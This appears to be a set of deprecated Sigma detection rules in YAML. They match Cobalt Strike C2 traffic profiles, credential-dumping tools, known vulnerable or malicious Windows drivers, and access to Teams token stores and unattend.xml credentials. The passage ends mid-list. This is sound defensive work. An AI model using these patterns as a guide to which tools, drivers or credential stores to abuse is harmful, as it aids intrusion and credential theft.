FILE: deprecated/web/proxy_cobalt_amazon.yml
================================================
title: CobaltStrike Malleable Amazon Browsing Traffic Profile
id: 953b895e-5cc9-454b-b183-7f3db555452e
status: deprecated
description: Detects Malleable Amazon Profile
references:
- https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile
- https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100
author: Markus Neis
date: 2019/11/12
modified: 2024/02/15
tags:
- attack.defense_evasion
- attack.command_and_control
- attack.t1071.001
logsource:
category: proxy
detection:
selection_1:
c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
cs-method: 'GET'
c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'
cs-host: 'www.amazon.com'
cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'
selection_2:
c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
cs-method: 'POST'
c-uri: '/N4215/adj/amzn.us.sr.aps'
cs-host: 'www.amazon.com'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/web/proxy_cobalt_malformed_uas.yml
================================================
title: CobaltStrike Malformed UAs in Malleable Profiles
id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8
status: deprecated
description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
references:
- https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
author: Florian Roth (Nextron Systems)
date: 2021/05/06
modified: 2024/02/15
tags:
- attack.defense_evasion
- attack.command_and_control
- attack.t1071.001
logsource:
category: proxy
detection:
selection1:
c-useragent:
- 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'
- 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'
selection2:
c-useragent|endswith: '; MANM; MANM)'
condition: 1 of selection*
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/web/proxy_cobalt_ocsp.yml
================================================
title: CobaltStrike Malleable (OCSP) Profile
id: 37325383-740a-403d-b1a2-b2b4ab7992e7
status: deprecated
description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
references:
- https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile
author: Markus Neis
date: 2019/11/12
modified: 2024/02/15
tags:
- attack.defense_evasion
- attack.command_and_control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-uri|contains: '/oscp/'
cs-host: 'ocsp.verisign.com'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/web/proxy_cobalt_onedrive.yml
================================================
title: CobaltStrike Malleable OneDrive Browsing Traffic Profile
id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
status: deprecated
description: Detects Malleable OneDrive Profile
references:
- https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile
author: Markus Neis
date: 2019/11/12
modified: 2024/02/15
tags:
- attack.defense_evasion
- attack.command_and_control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
cs-method: 'GET'
c-uri|endswith: '\?manifest=wac'
cs-host: 'onedrive.live.com'
filter:
c-uri|startswith: 'http'
c-uri|contains: '://onedrive.live.com/'
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/web/proxy_ios_implant.yml
================================================
title: iOS Implant URL Pattern
id: e06ac91d-b9e6-443d-8e5b-af749e7aa6b6
status: deprecated # Deprecated to being related to Ios so logging will vary and its old
description: Detects URL pattern used by iOS Implant
references:
- https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html
- https://twitter.com/craiu/status/1167358457344925696
author: Florian Roth (Nextron Systems)
date: 2019/08/30
modified: 2024/02/26
tags:
- attack.execution
- attack.t1203
- attack.collection
- attack.t1005
- attack.t1119
- attack.credential_access
- attack.t1528
- attack.t1552.001
logsource:
category: proxy
detection:
selection:
c-uri|contains: '/list/suc\?name='
condition: selection
fields:
- ClientIP
- c-uri
- c-useragent
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/web/proxy_webdav_search_ms.yml
================================================
title: Search-ms and WebDAV Suspicious Indicators in URL
id: 5039f3d2-406a-4c1a-9350-7a5a85dc84c2
status: deprecated # See https://github.com/SigmaHQ/sigma/pull/4845
description: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.
references:
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
author: Micah Babinski
date: 2023/08/21
modified: 2024/05/10
tags:
- attack.initial_access
- attack.t1584
- attack.t1566
logsource:
category: proxy
detection:
selection_search_ms:
c-uri|contains|all:
- 'search' # Matches on search:query= or search-ms:query=
- ':query='
- 'webdav'
selection_search_term:
c-uri|contains:
# Note: Add additional keywords for additional coverage
- 'agreement'
- 'invoice'
- 'notice'
- 'payment'
filter_main_local_ips:
dst_ip|cidr:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- '::1/128' # IPv6 loopback
- 'fe80::/10' # IPv6 link-local addresses
- 'fc00::/7' # IPv6 private addresses
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/create_remote_thread_win_susp_remote_thread_target.yml
================================================
title: Suspicious Remote Thread Target
id: f016c716-754a-467f-a39e-63c06f773987
status: deprecated
description: |
Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild.
This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.
It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
references:
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Florian Roth (Nextron Systems)
date: 2022/08/25
modified: 2023/05/05
logsource:
product: windows
category: create_remote_thread
detection:
selection:
TargetImage|endswith:
- '\spoolsv.exe'
- '\notepad.exe'
filter:
- SourceImage|endswith: '\csrss.exe'
- SourceImage|contains: 'unknown process'
- StartFunction: 'EtwpNotificationThread'
condition: selection and not filter
fields:
- ComputerName
- User
- SourceImage
- TargetImage
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/driver_load_win_mal_creddumper.yml
================================================
title: Credential Dumping Tools Service Execution
id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2
related:
- id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
type: derived
status: deprecated
description: Detects well-known credential dumping tools execution via service execution events
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
date: 2017/03/05
modified: 2023/12/11
tags:
- attack.credential_access
- attack.execution
- attack.t1003.001
- attack.t1003.002
- attack.t1003.004
- attack.t1003.005
- attack.t1003.006
- attack.t1569.002
- attack.s0005
logsource:
product: windows
category: driver_load
detection:
selection:
ImageLoaded|contains:
- 'cachedump'
- 'dumpsvc'
- 'fgexec'
- 'gsecdump'
- 'mimidrv'
- 'pwdump'
- 'servpw'
condition: selection
falsepositives:
- Legitimate Administrator using credential dumping tool for password recovery
level: critical
================================================
FILE: deprecated/windows/driver_load_win_mal_poortry_driver.yml
================================================
title: Usage Of Malicious POORTRY Signed Driver
id: 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6
status: deprecated
description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
references:
- https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/12/16
modified: 2023/09/13
tags:
- attack.privilege_escalation
- attack.t1543
- attack.t1068
logsource:
category: driver_load
product: windows
detection:
selection_image:
ImageLoaded|contains:
- '\prokiller64.sys'
- '\gftkyj64.sys'
- '\KApcHelper_x64.sys'
- '\NodeDriver.sys'
- '\LcTkA.sys'
selection_sysmon:
Hashes|contains:
- 'SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc'
- 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c'
- 'SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104'
- 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c'
- 'SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4'
- 'SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497'
- 'SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a'
- 'SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d'
- 'SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c'
- 'SHA1=cc65bf60600b64feece5575f21ab89e03a728332'
- 'SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e'
- 'SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98'
- 'MD5=10f3679384a03cb487bda9621ceb5f90'
- 'MD5=04a88f5974caa621cee18f34300fc08a'
- 'MD5=6fcf56f6ca3210ec397e55f727353c4a'
- 'MD5=0f16a43f7989034641fd2de3eb268bf1'
- 'MD5=ee6b1a79cb6641aa44c762ee90786fe0'
- 'MD5=909f3fc221acbe999483c87d9ead024a'
condition: 1 of selection*
falsepositives:
- Legitimate BIOS driver updates (should be rare)
level: high
================================================
FILE: deprecated/windows/driver_load_win_powershell_script_installed_as_service.yml
================================================
title: PowerShell Scripts Run by a Services
id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073
related:
- id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
type: derived
status: deprecated
description: Detects powershell script installed as a Service
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020/10/06
modified: 2023/12/11
tags:
- attack.execution
- attack.t1569.002
logsource:
product: windows
category: driver_load
detection:
selection:
ImageLoaded|contains:
- 'powershell'
- 'pwsh'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/driver_load_win_vuln_avast_anti_rootkit_driver.yml
================================================
title: Vulnerable AVAST Anti Rootkit Driver Load
id: 7c676970-af4f-43c8-80af-ec9b49952852
status: deprecated
description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
references:
- https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/07/28
modified: 2023/09/12
tags:
- attack.privilege_escalation
- attack.t1543.003
logsource:
product: windows
category: driver_load
detection:
selection_sysmon:
Hashes|contains:
- 'MD5=a179c4093d05a3e1ee73f6ff07f994aa'
- 'SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4'
- 'SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1'
driver_img:
ImageLoaded|endswith: '\aswArPot.sys'
driver_status:
- Signed: 'false'
- SignatureStatus: Expired
condition: selection_sysmon or all of driver_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/driver_load_win_vuln_dell_driver.yml
================================================
title: Vulnerable Dell BIOS Update Driver Load
id: 21b23707-60d6-41bb-96e3-0f0481b0fed9
status: deprecated
description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
references:
- https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
author: Florian Roth (Nextron Systems)
date: 2021/05/05
modified: 2023/09/12
tags:
- attack.privilege_escalation
- cve.2021.21551
- attack.t1543
- attack.t1068
logsource:
category: driver_load
product: windows
detection:
selection_image:
ImageLoaded|contains: '\DBUtil_2_3.Sys'
selection_sysmon:
Hashes|contains:
- 'SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5'
- 'SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1'
- 'SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD'
- 'SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25'
- 'MD5=C996D7971C49252C582171D9380360F2'
- 'MD5=D2FD132AB7BBC6BBB87A84F026FA0244'
condition: 1 of selection*
falsepositives:
- Legitimate BIOS driver updates (should be rare)
level: high
================================================
FILE: deprecated/windows/driver_load_win_vuln_drivers_names.yml
================================================
title: Vulnerable Driver Load By Name
id: 839f1ee1-292d-495a-bf37-818267b8ee82
related:
- id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8
type: derived
status: deprecated
description: Detects the load of known vulnerable drivers via their names only.
references:
- https://loldrivers.io/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/10/03
modified: 2023/09/03
tags:
- attack.privilege_escalation
- attack.t1543.003
- attack.t1068
logsource:
product: windows
category: driver_load
detection:
selection:
ImageLoaded|endswith:
- '\reddriver.sys'
- '\mhyprot2.sys'
- '\hwos2ec7x64.sys'
- '\asrdrv103.sys'
- '\e29f6311ae87542b3d693c1f38e4e3ad.sys'
- '\gvcidrv64.sys'
- '\spwizimgvt.sys'
- '\hwos2ec10x64.sys'
- '\e939448b28a4edc81f1f974cebf6e7d2.sys'
- '\phymemx64.sys'
- '\dh_kernel.sys'
- '\bs_def.sys'
- '\nbiolib_x64.sys'
- '\viraglt64.sys'
- '\ntiolib.sys'
- '\paniox64.sys'
- '\libnicm.sys'
- '\phymem64.sys'
- '\fiddrv.sys'
- '\cpuz141.sys'
- '\yyprotect64.sys'
- '\daxin_blank3.sys'
- '\aswarpot.sys'
- '\t8.sys'
- '\driver7-x86-withoutdbg.sys'
- '\dcr.sys'
- '\b3.sys'
- '\asupio.sys'
- '\blackbonedrv10.sys'
- '\rzpnk.sys'
- '\iomem64.sys'
- '\kfeco11x64.sys'
- '\t.sys'
- '\wantd.sys'
- '\mimikatz.sys'
- '\wantd_4.sys'
- '\chaos-rootkit.sys'
- '\mhyprot.sys'
- '\nlslexicons0024uvn.sys'
- '\piddrv64.sys'
- '\aswvmm.sys'
- '\superbmc.sys'
- '\kprocesshacker.sys'
- '\lmiinfo.sys'
- '\jokercontroller.sys'
- '\blackbone.sys'
- '\fur.sys'
- '\vboxmousent.sys'
- '\mapmom.sys'
- '\windows-xp-64.sys'
- '\d3.sys'
- '\inpout32.sys'
- '\tfbfs3ped.sys'
- '\etdsupp.sys'
- '\asmmap64.sys'
- '\lurker.sys'
- '\alsysio64.sys'
- '\ntiolib_x64.sys'
- '\asas.sys'
- '\vproeventmonitor.sys'
- '\dbutil_2_3.sys'
- '\malicious.sys'
- '\cpupress.sys'
- '\netfilter2.sys'
- '\wintapix.sys'
- '\mhyprotnap.sys'
- '\ktes.sys'
- '\titidrv.sys'
- '\rtcore64.sys'
- '\physmem.sys'
- '\d.sys'
- '\asrdrv106.sys'
- '\winiodrv.sys'
- '\phlashnt.sys'
- '\sfdrvx64.sys'
- '\ene.sys'
- '\nqrmq.sys'
- '\phydmaccx86.sys'
- '\fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys'
- '\magdrvamd64.sys'
- '\a26363e7b02b13f2b8d697abb90cd5c3.sys'
- '\amdryzenmasterdriver.sys'
- '\amigendrv64.sys'
- '\d2.sys'
- '\agent64.sys'
- '\bs_rcio64.sys'
- '\goad.sys'
- '\bsmi.sys'
- '\nvflsh64.sys'
- '\gametersafe.sys'
- '\ndislan.sys'
- '\bw.sys'
- '\directio32.sys'
- '\asrsmartconnectdrv.sys'
- '\ktgn.sys'
- '\eneio64.sys'
- '\amp.sys'
- '\gdrv.sys'
- '\tmel.sys'
- '\nstr.sys'
- '\winring0.sys'
- '\fiddrv64.sys'
- '\tmcomm.sys'
- '\daxin_blank2.sys'
- '\poortry2.sys'
- '\bsmemx64.sys'
- '\asio.sys'
- '\gmer64.sys'
- '\panio.sys'
- '\ucorew64.sys'
- '\atszio64.sys'
- '\nt2.sys'
- '\pciecubed.sys'
- '\nvflsh32.sys'
- '\ssport.sys'
- '\wcpu.sys'
- '\winio64.sys'
- '\msio64.sys'
- '\black.sys'
- '\nicm.sys'
- '\daxin_blank1.sys'
- '\my.sys'
- '\tgsafe.sys'
- '\dbk64.sys'
- '\proxydrv.sys'
- '\1fc7aeeff3ab19004d2e53eae8160ab1.sys'
- '\capcom.sys'
- '\asio32.sys'
- '\proxy32.sys'
- '\asrdrv102.sys'
- '\vboxguest.sys'
- '\vboxtap.sys'
- '\daxin_blank.sys'
- '\poortry.sys'
- '\ntbios.sys'
- '\glckio2.sys'
- '\dbutildrv2.sys'
- '\kfeco10x64.sys'
- '\lenovodiagnosticsdriver.sys'
- '\netfilter.sys'
- '\corsairllaccess64.sys'
- '\semav6msr.sys'
- '\bs_rciow1064.sys'
- '\vboxusbmon.sys'
- '\nodedriver.sys'
- '\iobitunlocker.sys'
- '\smep_namco.sys'
- '\asio64.sys'
- '\xjokercontroller.sys'
- '\irec.sys'
- '\asribdrv.sys'
- '\mhyprot3.sys'
- '\daxin_blank6.sys'
- '\fidpcidrv.sys'
- '\bandai.sys'
- '\procexp.sys'
- '\daxin_blank5.sys'
- '\daxin_blank4.sys'
- '\bedaisy.sys'
- '\asrdrv10.sys'
- '\bwrsh.sys'
- '\eio.sys'
- '\winio64a.sys'
- '\citmdrv_ia64.sys'
- '\7.sys'
- '\b.sys'
- '\bwrs.sys'
- '\nt3.sys'
- '\wiseunlo.sys'
- '\ncpl.sys'
- '\ctiio64.sys'
- '\hw.sys'
- '\asromgdrv.sys'
- '\bs_hwmio64.sys'
- '\lgdatacatcher.sys'
- '\rtkio.sys'
- '\winio32.sys'
- '\phydmaccx64.sys'
- '\mtcbsv64.sys'
- '\ni.sys'
- '\b4.sys'
- '\directio64.sys'
- '\vboxdrv.sys'
- '\nvflash.sys'
- '\hpportiox64.sys'
- '\bs_i2c64.sys'
- '\iomap64.sys'
- '\vboxusb.sys'
- '\msqpq.sys'
- '\sysinfo.sys'
- '\mhyprotect.sys'
- '\naldrv.sys'
- '\lgdcatcher.sys'
- '\echo_driver.sys'
- '\otipcibus.sys'
- '\testbone.sys'
- '\lctka.sys'
- '\wyproxy64.sys'
- '\pchunter.sys'
- '\amdpowerprofiler.sys'
- '\wantd_3.sys'
- '\test2.sys'
- '\rtcoremini64.sys'
- '\d4.sys'
- '\piddrv.sys'
- '\panmonflt.sys'
- '\windows8-10-32.sys'
- '\wantd_5.sys'
- '\mjj0ge.sys'
- '\kt2.sys'
- '\rtkiow8x64.sys'
- '\nstrwsk.sys'
- '\msio32.sys'
- '\ktmutil7odm.sys'
- '\hwrwdrv.sys'
- '\nchgbios2x64.sys'
- '\bs_hwmio64_w10.sys'
- '\mydrivers.sys'
- '\t7.sys'
- '\wantd_6.sys'
- '\sandra.sys'
- '\atillk64.sys'
- '\cpuz.sys'
- '\netproxydriver.sys'
- '\protects.sys'
- '\asrrapidstartdrv.sys'
- '\dh_kernel_10.sys'
- '\ef0e1725aaf0c6c972593f860531a2ea.sys'
- '\enetechio64.sys'
- '\citmdrv_amd64.sys'
- '\iqvw64e.sys'
- '\bsmixp64.sys'
- '\bs_i2cio.sys'
- '\prokiller64.sys'
- '\netflt.sys'
- '\4748696211bd56c2d93c21cab91e82a5.sys'
- '\openlibsys.sys'
- '\adv64drv.sys'
- '\be6318413160e589080df02bb3ca6e6a.sys'
- '\cupfixerx64.sys'
- '\se64a.sys'
- '\speedfan.sys'
- '\a236e7d654cd932b7d11cb604629a2d0.sys'
- '\winio32b.sys'
- '\winio64b.sys'
- '\sysdrv3s.sys'
- '\lv561av.sys'
- '\bs_def64.sys'
- '\mlgbbiicaihflrnh.sys'
- '\dbutil.sys'
- '\834761775.sys'
- '\kdriver.sys'
- '\spf.sys'
- '\dkrtk.sys'
- '\bs_flash64.sys'
- '\nt4.sys'
- '\4.sys'
- '\directio32_legacy.sys'
- '\viragt64.sys'
- '\hostnt.sys'
- '\poortry1.sys'
- '\c94f405c5929cfcccc8ad00b42c95083.sys'
- '\b1.sys'
- '\wantd_2.sys'
- '\mhyprotrpg.sys'
- '\nscm.sys'
- '\smep_capcom.sys'
- '\sense5ext.sys'
- '\lha.sys'
- '\atszio.sys'
- '\amifldrv64.sys'
- '\blacklotus_driver.sys'
- '\asrautochkupddrv.sys'
- '\cpuz_x64.sys'
- '\asrautochkupddrv_1_0_32.sys'
- '\bs_rcio.sys'
- '\elbycdio.sys'
- '\fidpcidrv64.sys'
- '\elrawdsk.sys'
- '\telephonuafy.sys'
- '\rwdrv.sys'
- '\lgcoretemp.sys'
- '\segwindrvx64.sys'
- '\windows7-32.sys'
- '\asrsetupdrv103.sys'
- '\hwinfo32.sys'
- '\inpoutx64.sys'
- '\asrdrv101.sys'
- '\asupio64.sys'
- '\monitor_win10_x64.sys'
- '\msrhook.sys'
- '\nt5.sys'
- '\wfshbr64.sys'
- '\driver7.sys'
- '\sfdrvx32.sys'
- '\asrdrv104.sys'
- '\gameink.sys'
- '\hwinfo64i.sys'
- '\bsmix64.sys'
- '\winio32a.sys'
- '\kbdcap64.sys'
- '\5a4fe297c7d42539303137b6d75b150d.sys'
- '\fairplaykd.sys'
- '\a9df5964635ef8bd567ae487c3d214c4.sys'
- '\fgme.sys'
- '\skill.sys'
- '\capcom2.sys'
- '\typelibde.sys'
- '\nt6.sys'
- '\winio64c.sys'
- '\driver7-x64.sys'
- '\air_system10.sys'
- '\panmonfltx64.sys'
- '\ntbios_2.sys'
- '\viragt.sys'
- '\zam64.sys'
- '\vmdrv.sys'
- '\iqvw64.sys'
- '\1.sys'
- '\t3.sys'
- '\2.sys'
- '\gftkyj64.sys'
- '\proxy64.sys'
- '\kevp64.sys'
- '\netfilterdrv.sys'
- '\4118b86e490aed091b1a219dba45f332.sys'
- '\6771b13a53b9c7449d4891e427735ea2.sys'
- '\mimidrv.sys'
- '\driver7-x86.sys'
- '\windbg.sys'
- '\80.sys'
- '\directio.sys'
- '\atomicredteamcapcom.sys'
- '\81.sys'
- '\full.sys'
- '\asrdrv.sys'
- '\kapchelper_x64.sys'
- '\c.sys'
- '\winflash64.sys'
- '\amsdk.sys'
condition: selection
falsepositives:
- False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version.
- If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)
level: low
================================================
FILE: deprecated/windows/driver_load_win_vuln_gigabyte_driver.yml
================================================
title: Vulnerable GIGABYTE Driver Load
id: 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647
status: deprecated
description: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation
references:
- https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b
- https://twitter.com/malmoeb/status/1551449425842786306
- https://github.com/fengjixuchui/gdrv-loader
- https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details
- https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details
author: Florian Roth (Nextron Systems)
date: 2022/07/25
modified: 2023/09/12
tags:
- attack.privilege_escalation
- attack.t1543.003
logsource:
product: windows
category: driver_load
detection:
selection:
Hashes|contains:
- 'MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3'
- 'MD5=C832A4313FF082258240B61B88EFA025'
- 'SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39'
- 'SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46'
- 'SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427'
- 'SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/driver_load_win_vuln_hw_driver.yml
================================================
title: Vulnerable HW Driver Load
id: 9bacc538-d1b9-4d42-862e-469eafc05a41
status: deprecated
description: Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation
references:
- https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/
- https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details
author: Florian Roth (Nextron Systems)
date: 2022/07/26
modified: 2023/09/12
tags:
- attack.privilege_escalation
- attack.t1543.003
logsource:
product: windows
category: driver_load
detection:
selection_name:
ImageLoaded|endswith: '\HW.sys'
selection_sysmon:
Hashes|contains:
- 'SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8'
- 'SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA'
- 'SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5'
- 'SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57'
- 'SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD'
- 'SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A'
- 'MD5=3247014BA35D406475311A2EAB0C4657'
- 'MD5=376B1E8957227A3639EC1482900D9B97'
- 'MD5=45C2D133D41D2732F3653ED615A745C8'
condition: 1 of selection*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/driver_load_win_vuln_lenovo_driver.yml
================================================
title: Vulnerable Lenovo Driver Load
id: ac683a42-877b-4ff8-91ac-69e94b0f70b4
status: deprecated
description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
references:
- https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities
- https://github.com/alfarom256/CVE-2022-3699/
author: Florian Roth (Nextron Systems)
date: 2022/11/10
modified: 2023/09/12
tags:
- attack.privilege_escalation
- cve.2021.21551
- attack.t1543
logsource:
category: driver_load
product: windows
detection:
selection:
Hashes|contains:
- 'SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE'
- 'SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F'
- 'MD5=B941C8364308990EE4CC6EADF7214E0F'
condition: selection
falsepositives:
- Legitimate driver loads (old driver that didn't receive an update)
level: high
================================================
FILE: deprecated/windows/file_event_win_access_susp_teams.yml
================================================
title: Suspicious File Event With Teams Objects
id: 6902955a-01b7-432c-b32a-6f5f81d8f624
status: deprecated
description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
references:
- https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
- https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
author: '@SerkinValery'
date: 2022/09/16
modified: 2024/07/22
tags:
- attack.credential_access
- attack.t1528
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains:
- '\Microsoft\Teams\Cookies'
- '\Microsoft\Teams\Local Storage\leveldb'
filter:
Image|contains: '\Microsoft\Teams\current\Teams.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/file_event_win_access_susp_unattend_xml.yml
================================================
title: Suspicious Unattend.xml File Access
id: 1a3d42dd-3763-46b9-8025-b5f17f340dfb
status: deprecated
description: |
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
author: frack113
date: 2021/12/19
modified: 2024/07/22
tags:
- attack.credential_access
- attack.t1552.001
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '\unattend.xml'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/file_event_win_crackmapexec_patterns.yml
================================================
title: CrackMapExec File Creation Patterns
id: 9433ff9c-5d3f-4269-99f8-95fc826ea489
status: deprecated
description: Detects suspicious file creation patterns found in logs when CrackMapExec is used
references:
- https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
author: Florian Roth (Nextron Systems)
date: 2022/03/12
modified: 2024/03/01
tags:
- attack.credential_access
- attack.t1003.001
logsource:
product: windows
category: file_event
detection:
selection_lsass_dump1:
TargetFilename|startswith: 'C:\Windows\Temp\'
Image: 'C:\WINDOWS\system32\rundll32.exe'
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
TargetFilename|endswith:
- '.rtf'
- '.otf'
- '.odt'
- '.txt'
- '.doc'
- '.pdf'
- '.dll'
- '.docx'
- '.wpd'
- '.icns'
- '.db'
- '.ini'
- '.tex'
- '.sys'
- '.csv'
- '.fon'
- '.tar'
- '.ttf'
- '.xml'
- '.cfg'
- '.cpl'
- '.jpg'
- '.drv'
- '.cur'
- '.tmp'
